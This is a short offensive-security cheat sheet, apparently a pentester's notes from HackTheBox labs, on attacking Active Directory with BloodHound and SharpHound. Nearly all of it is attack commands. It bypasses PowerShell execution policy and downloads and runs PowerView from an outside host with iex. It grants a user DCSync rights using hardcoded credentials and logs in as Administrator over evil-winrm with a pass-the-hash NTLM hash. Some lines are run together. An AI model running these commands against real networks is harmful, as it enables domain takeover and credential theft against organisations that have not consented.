BloodHound
Brief
Usage
WriteDACL
RustHound
Last updated
Last updated
neo4j console
# creds = neo4j : neo4j
# forgotten password
locate neo4j | grep auth
bloodhoundpowershell -ep bypass
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain $TARGETDOMAIN -ZipFileName bloodhound.zipiex(new-object net.webclient).downloadstring('http://10.10.14.4:9090/PowerView.ps1')
$pass = convertto-securestring 'abc123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\john', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity htb.local -Rights DCSync
Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6